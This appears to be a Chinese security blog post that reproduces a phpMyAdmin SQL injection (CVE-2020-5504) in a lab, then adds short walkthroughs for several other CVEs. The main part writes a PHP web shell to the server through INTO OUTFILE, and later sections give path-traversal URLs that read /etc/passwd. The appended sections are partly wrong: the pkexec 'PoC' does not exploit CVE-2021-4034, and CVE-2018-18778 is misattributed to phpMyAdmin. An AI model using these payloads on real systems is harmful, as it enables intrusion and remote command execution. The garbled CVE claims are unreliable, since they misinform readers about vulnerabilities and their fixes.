phpmyadmin SQL注入 (CVE-2020-5504)复现

本文介绍了phpMyAdmin,一款免费的基于Web的MySQL数据库管理工具。指出在用户帐户页面存在SQL注入漏洞,恶意用户可注入自定义SQL。还给出了漏洞复现步骤,包括进入登陆页面、执行查询命令、查看返回数据包、构造木马及获取flag等。

工具简介

phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。

漏洞描述

在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。

漏洞复现

1、打开vulfocus靶场 访问IP后面加上/pma/index.php 进入登陆页面

提示的账号密码root 123456

2、点击SQL 输入 select @@datadir(查询数据库的路径)

3、输入 select @@basedir(查询MYSQL数据库的安装路径)

4、查看 SELECT load_file('/var/www/html/pma/index.php')

返回数据包3kb,一看就有东西,就对了。所以网站绝对路径为/var/www/html/pma

5、构造木马

select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE '/var/www/html/pma/shell.php'

6、使用写入的参数cmd传入值 获取flag

### CVE-2021-4034 漏洞复现步骤 CVE-2021-4034 是一个存在于 Polkit 的 pkexec 组件中的本地提权漏洞。该漏洞利用了 pkexec 对命令行参数处理中的缺陷,攻击者可以利用此漏洞在受影响的系统上以 root 权限执行任意代码。 **复现步骤**: 1. **确认目标系统是否受影响**:检查系统是否安装了 Polkit 并且版本是否低于 0.117。可以通过以下命令查看版本: ```bash pkexec --version ``` 2. **下载并编译 PoC 代码**:利用已知的 PoC 代码来验证漏洞的存在。以下是一个简单的示例: ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/wait.h> int main() { char *argv[] = {"/usr/bin/pkexec", "--user", "root", "/bin/sh", "-c", "id", NULL}; execve("/usr/bin/pkexec", argv, NULL); return 0; } ``` 编译并运行此代码: ```bash gcc -o exploit exploit.c ./exploit ``` 3. **验证漏洞利用**:如果成功,攻击者可以获得 root 权限。可以通过检查输出的 `uid` 和 `gid` 来确认是否获得了 root 权限。 ### CVE-2018-12613 漏洞复现步骤 CVE-2018-12613 是一个存在于 phpMyAdmin 中的文件包含漏洞。攻击者可以通过构造特定的 URL 来包含任意文件,从而导致远程代码执行。 **复现步骤**: 1. **确认目标系统是否受影响**:确保目标系统运行的是受影响版本的 phpMyAdmin(4.8.x)。 2. **构造恶意请求**:使用特定的 URL 路径来触发文件包含漏洞。例如: ``` http://127.0.0.1:8080/index.php?target=db_sql.php%3f/../../../../../../../../etc/passwd ``` 其中 `%3f` 是 `?` 的 URL 编码,用于绕过某些过滤机制。 3. **验证漏洞利用**:通过访问上述 URL,检查是否能够成功读取 `/etc/passwd` 文件或其他敏感文件的内容。 ### CVE-2018-18778 漏洞复现步骤 CVE-2018-18778 是另一个存在于 phpMyAdmin 中的文件包含漏洞,类似于 CVE-2018-12613。攻击者可以通过构造特定的 URL 来包含任意文件。 **复现步骤**: 1. **确认目标系统是否受影响**:确保目标系统运行的是受影响版本的 phpMyAdmin(4.8.x)。 2. **构造恶意请求**:使用特定的 URL 路径来触发文件包含漏洞。例如: ``` http://127.0.0.1:8080/index.php?target=phpinfo.php%3f/../../../../../../../../etc/passwd ``` 其中 `%3f` 是 `?` 的 URL 编码,用于绕过某些过滤机制。 3. **验证漏洞利用**:通过访问上述 URL,检查是否能够成功读取 `/etc/passwd` 文件或其他敏感文件的内容。 ### CVE-2020-17518 漏洞复现步骤 CVE-2020-17518 是一个存在于 Apache Flink 中的远程代码执行漏洞。攻击者可以通过构造特定的请求来触发此漏洞,从而在目标系统上执行任意代码。 **复现步骤**: 1. **确认目标系统是否受影响**:确保目标系统运行的是受影响版本的 Apache Flink(1.11.0 至 1.11.2)。 2. **构造恶意请求**:使用特定的 HTTP 请求来触发远程代码执行漏洞。例如,利用 Flink Web UI 的作业提交功能,上传包含恶意代码的 JAR 文件。 3. **验证漏洞利用**:通过上传并执行恶意 JAR 文件,检查是否能够在目标系统上执行任意命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值